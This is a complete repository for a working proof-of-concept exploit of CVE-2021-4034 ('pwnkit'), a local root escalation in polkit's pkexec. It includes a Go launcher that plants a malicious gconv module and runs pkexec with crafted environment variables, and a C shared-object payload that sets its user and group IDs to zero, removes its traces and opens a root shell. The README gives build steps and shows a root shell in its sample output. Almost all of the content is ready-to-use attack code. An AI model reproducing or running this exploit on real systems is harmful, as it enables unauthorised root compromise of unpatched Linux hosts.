├── .github └── workflows │ └── autorelease.yml ├── LICENSE ├── Makefile ├── README.md ├── exploit.go └── payload └── payload.c /.github/workflows/autorelease.yml: -------------------------------------------------------------------------------- 1 | name: Release 2 | on: 3 | push: 4 | tags: ["v[0-9]+.[0-9]+.[0-9]+"] 5 | branches: ["master"] 6 | 7 | jobs: 8 | tagged-release: 9 | name: "Tagged Release" 10 | if: startsWith( github.ref, 'refs/tags/v') 11 | runs-on: "ubuntu-latest" 12 | timeout-minutes: 45 13 | 14 | steps: 15 | - name: Go 1.17 16 | uses: actions/setup-go@v2 17 | with: 18 | go-version: ^1.17 19 | id: go 20 | 21 | - name: Check Out Code 22 | uses: actions/checkout@v2 23 | 24 | - name: Git Fetch Tags 25 | run: git fetch --prune --unshallow --tags -f 26 | 27 | - name: Make 28 | run: make 29 | 30 | - name: Release 31 | uses: "marvinpinto/action-automatic-releases@latest" 32 | with: 33 | repo_token: "${{ secrets.GITHUB_TOKEN }}" 34 | prerelease: false 35 | files: | 36 | ./pwnkit 37 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | MIT License 2 | 3 | Copyright (c) 2022 Daniele Linguaglossa 4 | 5 | Permission is hereby granted, free of charge, to any person obtaining a copy 6 | of this software and associated documentation files (the "Software"), to deal 7 | in the Software without restriction, including without limitation the rights 8 | to use, copy, modify, merge, publish, distribute, sublicense, and/or sell 9 | copies of the Software, and to permit persons to whom the Software is 10 | furnished to do so, subject to the following conditions: 11 | 12 | The above copyright notice and this permission notice shall be included in all 13 | copies or substantial portions of the Software. 14 | 15 | THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR 16 | IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, 17 | FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE 18 | AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER 19 | LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, 20 | OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE 21 | SOFTWARE. 22 | -------------------------------------------------------------------------------- /Makefile: -------------------------------------------------------------------------------- 1 | 2 | 3 | main: 4 | gcc payload/payload.c -o payload.so -shared -fPIC 5 | go build -trimpath -ldflags="-s -w" -o pwnkit exploit.go 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # poc-cve-2021-4034 2 | PoC for CVE-2021-4034 dubbed pwnkit 3 | 4 | 5 | ## Compile exploit.go 6 | 7 | `go build -o exploit exploit.go` 8 | 9 | 10 | ## Compile payload.so 11 | 12 | Once compiled put the shared object in the same folder as the exploit binary 13 | 14 | `gcc payload/payload.c -o payload.so -shared -fPIC` 15 | 16 | 17 | ## Enjoy 18 | 19 | ```shell 20 | dzonerzy@DESKTOP-5JHC90H:/mnt/c/Users/DZONERZY/GolangProjects/pkpwn$ ./exploit 21 | Spawning root shell! 22 | # id 23 | uid=0(root) gid=0(root) groups=0(root),4(adm),20(dialout),24(cdrom),25(floppy),27(sudo),29(audio),30(dip),44(video),46(plugdev),117(netdev),1000(dzonerzy) 24 | ``` 25 | -------------------------------------------------------------------------------- /exploit.go: -------------------------------------------------------------------------------- 1 | package main 2 | 3 | import ( 4 | _ "embed" 5 | "fmt" 6 | "io/ioutil" 7 | "log" 8 | "os" 9 | "path/filepath" 10 | "strings" 11 | "syscall" 12 | ) 13 | 14 | //go:embed payload.so 15 | var payload []byte 16 | 17 | const ( 18 | fake_charset = "payload" 19 | gconv_dir = "gconv" 20 | ) 21 | 22 | var ( 23 | gconv_content = "module PAYLOAD// INTERNAL ../../../../../../../..${REPLACE} 2\nmodule INTERNAL PAYLOAD// ../../../../../../../..${REPLACE} 2" 24 | ) 25 | 26 | func wirte_gconv_module() (err error) { 27 | if err := os.Mkdir(gconv_dir, 0o0755); err != nil { 28 | return err 29 | } 30 | directory, err := os.Getwd() 31 | if err != nil { 32 | return err 33 | } 34 | ioutil.WriteFile(filepath.Join(directory, "payload.so"), payload, 0o0755) 35 | replace := filepath.Join(directory, "payload.so") 36 | content := strings.Replace(gconv_content, "${REPLACE}", replace, -1) 37 | if err := ioutil.WriteFile(fmt.Sprintf("%s/gconv-modules", gconv_dir), []byte(content), 0o0755); err != nil { 38 | log.Fatal(err) 39 | } 40 | return nil 41 | 42 | } 43 | 44 | func main() { 45 | target := "/usr/bin/pkexec" 46 | if err := wirte_gconv_module(); err != nil { 47 | log.Fatal(err) 48 | } 49 | if err := os.Mkdir("GCONV_PATH=.", 0o0755); err != nil { 50 | log.Fatal(err) 51 | } 52 | if err := ioutil.WriteFile(fmt.Sprintf("GCONV_PATH=./%s", gconv_dir), []byte("\x00"), 0o0755); err != nil { 53 | log.Fatal(err) 54 | } 55 | if err := syscall.Exec(target, nil, []string{gconv_dir, "PATH=GCONV_PATH=.", "SHELL=/fake/shell", fmt.Sprintf("CHARSET=%s", fake_charset)}); err != nil { 56 | log.Fatal(err) 57 | } 58 | } 59 | -------------------------------------------------------------------------------- /payload/payload.c: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | // build with gcc payload.c -o payload.so -shared -fPIC 5 | 6 | void gconv() {} 7 | 8 | void gconv_init() { 9 | setuid(0); 10 | setgid(0); 11 | setenv("PATH", "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", 1); 12 | char* argv[] = { "/bin/sh", NULL }; 13 | char* envp[] = { "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin", NULL }; 14 | system("rm -r gconv"); 15 | system("rm -r \"GCONV_PATH=.\""); 16 | fprintf(stdout, "Spawning root shell!\n"); 17 | if (execve("/bin/sh", argv, envp) == -1) 18 | perror("Could not execve :( "); 19 | } 20 | --------------------------------------------------------------------------------